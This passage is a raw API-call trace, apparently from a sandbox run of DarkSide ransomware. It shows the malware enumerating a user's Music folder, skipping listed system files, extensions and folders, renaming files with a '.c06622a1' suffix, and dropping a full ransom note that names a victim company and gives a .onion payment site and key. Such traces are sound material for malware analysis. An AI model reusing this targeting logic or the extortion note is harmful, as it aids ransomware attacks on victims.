Size=0x80104) returned 0x710020 [0159.685] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4d107f54 [0159.685] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3dcf1d81 [0159.685] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x496f0217 [0159.685] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6a404fc6 [0159.685] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x267e7319 [0159.685] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x21a1cda6 [0159.685] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3ab7d768 [0159.685] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x17180f02 [0159.688] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x710094, Length=0x80) returned 0x42054659 [0159.688] RtlComputeCrc32 (PartialCrc=0x4659, Buffer=0x710094, Length=0x80) returned 0x1c800dec [0159.688] RtlComputeCrc32 (PartialCrc=0xdec, Buffer=0x710094, Length=0x80) returned 0xe0da4462 [0159.688] RtlComputeCrc32 (PartialCrc=0x4462, Buffer=0x710094, Length=0x80) returned 0xde106b57 [0159.688] RtlComputeCrc32 (PartialCrc=0x6b57, Buffer=0x710094, Length=0x80) returned 0x53b610e4 [0159.688] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x710020) returned 1 [0159.688] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0159.688] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0159.688] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7bc6b800, ftCreationTime.dwHighDateTime=0x1d5e0de, ftLastAccessTime.dwLowDateTime=0xca9a9aa0, ftLastAccessTime.dwHighDateTime=0x1d5e43f, ftLastWriteTime.dwLowDateTime=0xca9a9aa0, ftLastWriteTime.dwHighDateTime=0x1d5e43f, nFileSizeHigh=0x0, nFileSizeLow=0xdcf8, dwReserved0=0x0, dwReserved1=0x0, cFileName="wNYFoKYhkIFRjzLq.m4a", cAlternateFileName="WNYFOK~1.M4A")) returned 1 [0159.688] _wcsicmp (_Str1="wNYFoKYhkIFRjzLq.m4a", _Str2="README.c06622a1.TXT") returned 5 [0159.688] wcsstr (_Str="wNYFoKYhkIFRjzLq.m4a", _SubStr="README") returned 0x0 [0159.688] _wcsicmp (_Str1="autorun.inf", _Str2="wNYFoKYhkIFRjzLq.m4a") returned -22 [0159.688] wcslen (_String="autorun.inf") returned 0xb [0159.688] _wcsicmp (_Str1="boot.ini", _Str2="wNYFoKYhkIFRjzLq.m4a") returned -21 [0159.688] wcslen (_String="boot.ini") returned 0x8 [0159.688] _wcsicmp (_Str1="bootfont.bin", _Str2="wNYFoKYhkIFRjzLq.m4a") returned -21 [0159.688] wcslen (_String="bootfont.bin") returned 0xc [0159.689] _wcsicmp (_Str1="bootsect.bak", _Str2="wNYFoKYhkIFRjzLq.m4a") returned -21 [0159.689] wcslen (_String="bootsect.bak") returned 0xc [0159.689] _wcsicmp (_Str1="desktop.ini", _Str2="wNYFoKYhkIFRjzLq.m4a") returned -19 [0159.689] wcslen (_String="desktop.ini") returned 0xb [0159.689] _wcsicmp (_Str1="iconcache.db", _Str2="wNYFoKYhkIFRjzLq.m4a") returned -14 [0159.689] wcslen (_String="iconcache.db") returned 0xc [0159.689] _wcsicmp (_Str1="ntldr", _Str2="wNYFoKYhkIFRjzLq.m4a") returned -9 [0159.689] wcslen (_String="ntldr") returned 0x5 [0159.689] _wcsicmp (_Str1="ntuser.dat", _Str2="wNYFoKYhkIFRjzLq.m4a") returned -9 [0159.689] wcslen (_String="ntuser.dat") returned 0xa [0159.689] _wcsicmp (_Str1="ntuser.dat.log", _Str2="wNYFoKYhkIFRjzLq.m4a") returned -9 [0159.689] wcslen (_String="ntuser.dat.log") returned 0xe [0159.689] _wcsicmp (_Str1="ntuser.ini", _Str2="wNYFoKYhkIFRjzLq.m4a") returned -9 [0159.689] wcslen (_String="ntuser.ini") returned 0xa [0159.689] _wcsicmp (_Str1="thumbs.db", _Str2="wNYFoKYhkIFRjzLq.m4a") returned -3 [0159.689] wcslen (_String="thumbs.db") returned 0x9 [0159.689] _wcsicmp (_Str1="386", _Str2="m4a") returned -58 [0159.689] wcslen (_String="386") returned 0x3 [0159.689] _wcsicmp (_Str1="adv", _Str2="m4a") returned -12 [0159.689] wcslen (_String="adv") returned 0x3 [0159.689] _wcsicmp (_Str1="ani", _Str2="m4a") returned -12 [0159.689] wcslen (_String="ani") returned 0x3 [0159.689] _wcsicmp (_Str1="bat", _Str2="m4a") returned -11 [0159.689] wcslen (_String="bat") returned 0x3 [0159.689] _wcsicmp (_Str1="bin", _Str2="m4a") returned -11 [0159.689] wcslen (_String="bin") returned 0x3 [0159.689] _wcsicmp (_Str1="cab", _Str2="m4a") returned -10 [0159.689] wcslen (_String="cab") returned 0x3 [0159.689] _wcsicmp (_Str1="cmd", _Str2="m4a") returned -10 [0159.689] wcslen (_String="cmd") returned 0x3 [0159.689] _wcsicmp (_Str1="com", _Str2="m4a") returned -10 [0159.689] wcslen (_String="com") returned 0x3 [0159.689] _wcsicmp (_Str1="cpl", _Str2="m4a") returned -10 [0159.689] wcslen (_String="cpl") returned 0x3 [0159.690] _wcsicmp (_Str1="cur", _Str2="m4a") returned -10 [0159.690] wcslen (_String="cur") returned 0x3 [0159.690] _wcsicmp (_Str1="deskthemepack", _Str2="m4a") returned -9 [0159.690] wcslen (_String="deskthemepack") returned 0xd [0159.690] _wcsicmp (_Str1="diagcab", _Str2="m4a") returned -9 [0159.690] wcslen (_String="diagcab") returned 0x7 [0159.690] _wcsicmp (_Str1="diagcfg", _Str2="m4a") returned -9 [0159.690] wcslen (_String="diagcfg") returned 0x7 [0159.690] _wcsicmp (_Str1="diagpkg", _Str2="m4a") returned -9 [0159.690] wcslen (_String="diagpkg") returned 0x7 [0159.690] _wcsicmp (_Str1="dll", _Str2="m4a") returned -9 [0159.690] wcslen (_String="dll") returned 0x3 [0159.690] _wcsicmp (_Str1="drv", _Str2="m4a") returned -9 [0159.690] wcslen (_String="drv") returned 0x3 [0159.690] _wcsicmp (_Str1="exe", _Str2="m4a") returned -8 [0159.690] wcslen (_String="exe") returned 0x3 [0159.690] _wcsicmp (_Str1="hlp", _Str2="m4a") returned -5 [0159.690] wcslen (_String="hlp") returned 0x3 [0159.690] _wcsicmp (_Str1="icl", _Str2="m4a") returned -4 [0159.690] wcslen (_String="icl") returned 0x3 [0159.690] _wcsicmp (_Str1="icns", _Str2="m4a") returned -4 [0159.690] wcslen (_String="icns") returned 0x4 [0159.690] _wcsicmp (_Str1="ico", _Str2="m4a") returned -4 [0159.690] wcslen (_String="ico") returned 0x3 [0159.690] _wcsicmp (_Str1="ics", _Str2="m4a") returned -4 [0159.690] wcslen (_String="ics") returned 0x3 [0159.690] _wcsicmp (_Str1="idx", _Str2="m4a") returned -4 [0159.690] wcslen (_String="idx") returned 0x3 [0159.690] _wcsicmp (_Str1="ldf", _Str2="m4a") returned -1 [0159.690] wcslen (_String="ldf") returned 0x3 [0159.690] _wcsicmp (_Str1="lnk", _Str2="m4a") returned -1 [0159.690] wcslen (_String="lnk") returned 0x3 [0159.690] _wcsicmp (_Str1="mod", _Str2="m4a") returned 59 [0159.691] wcslen (_String="mod") returned 0x3 [0159.691] _wcsicmp (_Str1="mpa", _Str2="m4a") returned 60 [0159.691] wcslen (_String="mpa") returned 0x3 [0159.691] _wcsicmp (_Str1="msc", _Str2="m4a") returned 63 [0159.691] wcslen (_String="msc") returned 0x3 [0159.691] _wcsicmp (_Str1="msp", _Str2="m4a") returned 63 [0159.691] wcslen (_String="msp") returned 0x3 [0159.691] _wcsicmp (_Str1="msstyles", _Str2="m4a") returned 63 [0159.691] wcslen (_String="msstyles") returned 0x8 [0159.691] _wcsicmp (_Str1="msu", _Str2="m4a") returned 63 [0159.691] wcslen (_String="msu") returned 0x3 [0159.691] _wcsicmp (_Str1="nls", _Str2="m4a") returned 1 [0159.691] wcslen (_String="nls") returned 0x3 [0159.691] _wcsicmp (_Str1="nomedia", _Str2="m4a") returned 1 [0159.691] wcslen (_String="nomedia") returned 0x7 [0159.691] _wcsicmp (_Str1="ocx", _Str2="m4a") returned 2 [0159.691] wcslen (_String="ocx") returned 0x3 [0159.691] _wcsicmp (_Str1="prf", _Str2="m4a") returned 3 [0159.691] wcslen (_String="prf") returned 0x3 [0159.691] _wcsicmp (_Str1="ps1", _Str2="m4a") returned 3 [0159.691] wcslen (_String="ps1") returned 0x3 [0159.691] _wcsicmp (_Str1="rom", _Str2="m4a") returned 5 [0159.691] wcslen (_String="rom") returned 0x3 [0159.691] _wcsicmp (_Str1="rtp", _Str2="m4a") returned 5 [0159.691] wcslen (_String="rtp") returned 0x3 [0159.691] _wcsicmp (_Str1="scr", _Str2="m4a") returned 6 [0159.691] wcslen (_String="scr") returned 0x3 [0159.691] _wcsicmp (_Str1="shs", _Str2="m4a") returned 6 [0159.691] wcslen (_String="shs") returned 0x3 [0159.691] _wcsicmp (_Str1="spl", _Str2="m4a") returned 6 [0159.691] wcslen (_String="spl") returned 0x3 [0159.691] _wcsicmp (_Str1="sys", _Str2="m4a") returned 6 [0159.691] wcslen (_String="sys") returned 0x3 [0159.691] _wcsicmp (_Str1="theme", _Str2="m4a") returned 7 [0159.691] wcslen (_String="theme") returned 0x5 [0159.691] _wcsicmp (_Str1="themepack", _Str2="m4a") returned 7 [0159.692] wcslen (_String="themepack") returned 0x9 [0159.692] _wcsicmp (_Str1="wpx", _Str2="m4a") returned 10 [0159.692] wcslen (_String="wpx") returned 0x3 [0159.692] _wcsicmp (_Str1="lock", _Str2="m4a") returned -1 [0159.692] wcslen (_String="lock") returned 0x4 [0159.692] _wcsicmp (_Str1="key", _Str2="m4a") returned -2 [0159.692] wcslen (_String="key") returned 0x3 [0159.692] _wcsicmp (_Str1="hta", _Str2="m4a") returned -5 [0159.692] wcslen (_String="hta") returned 0x3 [0159.692] _wcsicmp (_Str1="msi", _Str2="m4a") returned 63 [0159.692] wcslen (_String="msi") returned 0x3 [0159.692] _wcsicmp (_Str1="pdb", _Str2="m4a") returned 3 [0159.692] wcslen (_String="pdb") returned 0x3 [0159.692] _wcsicmp (_Str1="sqlite", _Str2="m4a") returned 6 [0159.692] wcslen (_String="sqlite") returned 0x6 [0159.692] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\G1kIcNUvF9a1L5rTisLt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\g1kicnuvf9a1l5rtislt")) returned 0x10 [0159.692] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0159.692] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\G1kIcNUvF9a1L5rTisLt" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\G1kIcNUvF9a1L5rTisLt") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\G1kIcNUvF9a1L5rTisLt" [0159.692] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\G1kIcNUvF9a1L5rTisLt") returned 0x3c [0159.692] wcscpy (in: _Dest=0x32400da, _Source="wNYFoKYhkIFRjzLq.m4a" | out: _Dest="wNYFoKYhkIFRjzLq.m4a") returned="wNYFoKYhkIFRjzLq.m4a" [0159.692] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\G1kIcNUvF9a1L5rTisLt\\wNYFoKYhkIFRjzLq.m4a", dwFileAttributes=0x80) returned 1 [0159.693] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\G1kIcNUvF9a1L5rTisLt\\wNYFoKYhkIFRjzLq.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\g1kicnuvf9a1l5rtislt\\wnyfokyhkifrjzlq.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c [0159.693] SetFilePointerEx (in: hFile=0x1c, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.693] ReadFile (in: hFile=0x1c, lpBuffer=0x32e9a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ea34, lpOverlapped=0x0 | out: lpBuffer=0x32e9a4*, lpNumberOfBytesRead=0x32ea34*=0x90, lpOverlapped=0x0) returned 1 [0159.693] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e9a4, Length=0x80) returned 0xc1429f5d [0159.694] RtlComputeCrc32 (PartialCrc=0x9f5d, Buffer=0x32e9a4, Length=0x80) returned 0x15c8d1b3 [0159.694] RtlComputeCrc32 (PartialCrc=0xd1b3, Buffer=0x32e9a4, Length=0x80) returned 0xdd8356cf [0159.694] RtlComputeCrc32 (PartialCrc=0x56cf, Buffer=0x32e9a4, Length=0x80) returned 0x24ceaa70 [0159.694] RtlComputeCrc32 (PartialCrc=0xaa70, Buffer=0x32e9a4, Length=0x80) returned 0x964f65c [0159.694] CloseHandle (hObject=0x1c) returned 1 [0159.694] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0159.694] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\G1kIcNUvF9a1L5rTisLt\\wNYFoKYhkIFRjzLq.m4a" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\G1kIcNUvF9a1L5rTisLt\\wNYFoKYhkIFRjzLq.m4a") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\G1kIcNUvF9a1L5rTisLt\\wNYFoKYhkIFRjzLq.m4a" [0159.694] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\G1kIcNUvF9a1L5rTisLt\\wNYFoKYhkIFRjzLq.m4a") returned 0x51 [0159.694] wcscpy (in: _Dest=0x325010a, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0159.694] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\G1kIcNUvF9a1L5rTisLt\\wNYFoKYhkIFRjzLq.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\g1kicnuvf9a1l5rtislt\\wnyfokyhkifrjzlq.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\G1kIcNUvF9a1L5rTisLt\\wNYFoKYhkIFRjzLq.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\g1kicnuvf9a1l5rtislt\\wnyfokyhkifrjzlq.m4a.c06622a1"), dwFlags=0x8) returned 1 [0159.696] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\G1kIcNUvF9a1L5rTisLt\\wNYFoKYhkIFRjzLq.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\g1kicnuvf9a1l5rtislt\\wnyfokyhkifrjzlq.m4a.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1c [0159.696] CreateIoCompletionPort (FileHandle=0x1c, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0159.696] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x2690020 [0159.704] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xc5f4a5d [0159.704] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x53b6153f [0159.704] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x985fd48 [0159.704] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x23ce7baf [0159.704] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6dee5395 [0159.704] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x40643ed5 [0159.704] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6312ce5e [0159.704] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6d8115d6 [0159.708] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2690094, Length=0x80) returned 0x46de833 [0159.708] RtlComputeCrc32 (PartialCrc=0xe833, Buffer=0x2690094, Length=0x80) returned 0xd1567610 [0159.708] RtlComputeCrc32 (PartialCrc=0x7610, Buffer=0x2690094, Length=0x80) returned 0xbdcc35ee [0159.708] RtlComputeCrc32 (PartialCrc=0x35ee, Buffer=0x2690094, Length=0x80) returned 0x626c62e3 [0159.708] RtlComputeCrc32 (PartialCrc=0x62e3, Buffer=0x2690094, Length=0x80) returned 0xbb04e635 [0159.708] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2690020) returned 1 [0159.708] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0159.708] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0159.708] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0159.708] FindClose (in: hFindFile=0x154188 | out: hFindFile=0x154188) returned 1 [0159.708] _wcsicmp (_Str1="backup", _Str2="G1kIcNUvF9a1L5rTisLt") returned -5 [0159.708] wcslen (_String="backup") returned 0x6 [0159.708] _wcsicmp (_Str1="bak", _Str2="G1kIcNUvF9a1L5rTisLt") returned -5 [0159.708] wcslen (_String="bak") returned 0x3 [0159.708] _wcsicmp (_Str1="back", _Str2="G1kIcNUvF9a1L5rTisLt") returned -5 [0159.708] wcslen (_String="back") returned 0x4 [0159.708] _wcsicmp (_Str1="archive", _Str2="G1kIcNUvF9a1L5rTisLt") returned -6 [0159.708] wcslen (_String="archive") returned 0x7 [0159.708] _wcsicmp (_Str1="bckp", _Str2="G1kIcNUvF9a1L5rTisLt") returned -5 [0159.708] wcslen (_String="bckp") returned 0x4 [0159.708] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3210048) returned 1 [0159.710] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3220050) returned 1 [0159.711] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x33a9a070, ftCreationTime.dwHighDateTime=0x1d5dc40, ftLastAccessTime.dwLowDateTime=0x1ead4420, ftLastAccessTime.dwHighDateTime=0x1d5d807, ftLastWriteTime.dwLowDateTime=0x1ead4420, ftLastWriteTime.dwHighDateTime=0x1d5d807, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0yI t", cAlternateFileName="J0YIT~1")) returned 1 [0159.711] _wcsicmp (_Str1="$recycle.bin", _Str2="J0yI t") returned -70 [0159.711] wcslen (_String="$recycle.bin") returned 0xc [0159.711] _wcsicmp (_Str1="config.msi", _Str2="J0yI t") returned -7 [0159.711] wcslen (_String="config.msi") returned 0xa [0159.711] _wcsicmp (_Str1="$windows.~bt", _Str2="J0yI t") returned -70 [0159.711] wcslen (_String="$windows.~bt") returned 0xc [0159.711] _wcsicmp (_Str1="$windows.~ws", _Str2="J0yI t") returned -70 [0159.711] wcslen (_String="$windows.~ws") returned 0xc [0159.711] _wcsicmp (_Str1="windows", _Str2="J0yI t") returned 13 [0159.711] wcslen (_String="windows") returned 0x7 [0159.711] _wcsicmp (_Str1="appdata", _Str2="J0yI t") returned -9 [0159.711] wcslen (_String="appdata") returned 0x7 [0159.711] _wcsicmp (_Str1="application data", _Str2="J0yI t") returned -9 [0159.711] wcslen (_String="application data") returned 0x10 [0159.711] _wcsicmp (_Str1="boot", _Str2="J0yI t") returned -8 [0159.711] wcslen (_String="boot") returned 0x4 [0159.711] _wcsicmp (_Str1="google", _Str2="J0yI t") returned -3 [0159.711] wcslen (_String="google") returned 0x6 [0159.711] _wcsicmp (_Str1="mozilla", _Str2="J0yI t") returned 3 [0159.711] wcslen (_String="mozilla") returned 0x7 [0159.711] _wcsicmp (_Str1="program files", _Str2="J0yI t") returned 6 [0159.711] wcslen (_String="program files") returned 0xd [0159.711] _wcsicmp (_Str1="program files (x86)", _Str2="J0yI t") returned 6 [0159.711] wcslen (_String="program files (x86)") returned 0x13 [0159.711] _wcsicmp (_Str1="programdata", _Str2="J0yI t") returned 6 [0159.712] wcslen (_String="programdata") returned 0xb [0159.712] _wcsicmp (_Str1="system volume information", _Str2="J0yI t") returned 9 [0159.712] wcslen (_String="system volume information") returned 0x19 [0159.712] _wcsicmp (_Str1="tor browser", _Str2="J0yI t") returned 10 [0159.712] wcslen (_String="tor browser") returned 0xb [0159.712] _wcsicmp (_Str1="windows.old", _Str2="J0yI t") returned 13 [0159.712] wcslen (_String="windows.old") returned 0xb [0159.712] _wcsicmp (_Str1="intel", _Str2="J0yI t") returned -1 [0159.712] wcslen (_String="intel") returned 0x5 [0159.712] _wcsicmp (_Str1="msocache", _Str2="J0yI t") returned 3 [0159.712] wcslen (_String="msocache") returned 0x8 [0159.712] _wcsicmp (_Str1="perflogs", _Str2="J0yI t") returned 6 [0159.712] wcslen (_String="perflogs") returned 0x8 [0159.712] _wcsicmp (_Str1="x64dbg", _Str2="J0yI t") returned 14 [0159.712] wcslen (_String="x64dbg") returned 0x6 [0159.712] _wcsicmp (_Str1="public", _Str2="J0yI t") returned 6 [0159.712] wcslen (_String="public") returned 0x6 [0159.712] _wcsicmp (_Str1="all users", _Str2="J0yI t") returned -9 [0159.712] wcslen (_String="all users") returned 0x9 [0159.712] _wcsicmp (_Str1="default", _Str2="J0yI t") returned -6 [0159.712] wcslen (_String="default") returned 0x7 [0159.712] wcscpy (in: _Dest=0x208e20, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*" [0159.712] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*") returned 0x29 [0159.712] wcscpy (in: _Dest=0x208e70, _Source="J0yI t" | out: _Dest="J0yI t") returned="J0yI t" [0159.712] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3210048 [0159.712] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3220050 [0159.713] wcscpy (in: _Dest=0x3210048, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J0yI t" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J0yI t") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J0yI t" [0159.713] GetNamedSecurityInfoW () returned 0x0 [0159.713] SetEntriesInAclW () returned 0x0 [0159.713] SetNamedSecurityInfoW () returned 0x0 [0159.715] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x22b8e8) returned 1 [0159.715] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x32e8ec | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0159.715] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J0yI t" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\j0yi t")) returned 1 [0159.715] strlen (_Str="----------- [ Welcome to DarkSide - I-D Foods Corporation] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n 9NtjyWHbqWYTbhBpJ2ht4tKo7DQgTGmQ4IGHCFvgjiSMTNopVgQ9YIh9KRWkQgmvxviZtJGOakzykMzWKRgxwf2pCxpdMT8iGlKcsSOsxVOUXIGEgpy6tLqliTTEKWnohcYOhCF3DYMePMxEYa0eCmED1EXEG5QOZCpmkgDl5s5VSUF5uhnKsunUtKGS24iEAr2hxsJ1zMcMHmKVrf3bvRyhYVKXwlXVggxE7ncowldcK3v3CiKC24jKVd6OH5QrhVyyQLrFM5RE3Y0RcTeRTIqf1J5CIEhTiG3TH7SEpws4wfkt9RZ7rBWT4n3B69Z9JuPzyFCBwPKF7gTzEYzixIGzFbJyLSZXff9ryv3yL3JeKywAcoBafos0dLSkRgf1X1a1S2ud4kXa5GRU4W7rhCQsnJ8vAcv1AXaPRq9ESySBWQdGCQMSci0ex0oE4EfCDW3jjyXtaPofqNFhibodJFmOyTKwie1OcW6Kh6Ih6JxXXfUXr4VbRILzsiPXsOTTisDaEicID1E0SJRluBus2UhPyogJiZ7UpmUu9LUe3yAi3Bhox3pLv8E \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0x7ca [0159.715] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\j0yi t\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0159.715] WriteFile (in: hFile=0x1bc, lpBuffer=0x17dc98*, nNumberOfBytesToWrite=0x7ca, lpNumberOfBytesWritten=0x32e8bc, lpOverlapped=0x0 | out: lpBuffer=0x17dc98*, lpNumberOfBytesWritten=0x32e8bc*=0x7ca, lpOverlapped=0x0) returned 1 [0159.728] CloseHandle (hObject=0x1bc) returned 1 [0159.728] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0159.728] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J0yI t" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\j0yi t")) returned 0x10 [0159.728] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J0yI t" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J0yI t\\") returned="" [0159.728] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J0yI t\\") returned 0x2f [0159.728] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J0yI t\\*", fInfoLevelId=0x0, lpFindFileData=0x32eb1c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32eb1c) returned 0x154188 [0159.728] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x33a9a070, ftCreationTime.dwHighDateTime=0x1d5dc40, ftLastAccessTime.dwLowDateTime=0x8ce56020, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, 